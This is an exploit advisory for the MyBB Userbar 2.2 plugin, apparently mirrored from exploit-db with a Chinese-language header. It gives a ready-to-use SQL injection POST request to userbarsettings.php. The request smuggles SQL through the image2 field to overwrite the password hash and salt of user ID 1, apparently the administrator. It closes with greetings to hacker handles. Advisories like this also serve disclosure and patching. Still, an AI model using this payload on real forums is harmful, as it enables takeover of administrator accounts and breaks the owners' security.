MyBB Forum Userbar Plugin (Userbar 2.2) – SQL Injection

  • 作者: Mario_Vs
    日期: 2011-10-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17962/
  • ---------------------------------------------------------------------
Exploit Title : MyBB Forum Userbar Plugin (Userbar v2.2)
---------------------------------------------------------------------

Author: Mario_Vs
Date: 10/10/2011
Site: http://mariovs.pl/
@	: mario_vs[at]o2.pl
---------------------------------------------------------------------

Description >

Vendor 	: http://mods.mybb.com/download/userbar-plugin
Tested On : Windows 7
---------------------------------------------------------------------

SQL Injection

>> userbarsettings.php

POST -> setting1=1&setting2=1&setting3=3&image2=1',password='90be07bf33c5e547c3e78b236a83f497',salt='aXZV15uC&uid=1&submit=Submit
---------------------------------------------------------------------

---------------------------------------------------------------------

Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2

All users: HackinQ.pl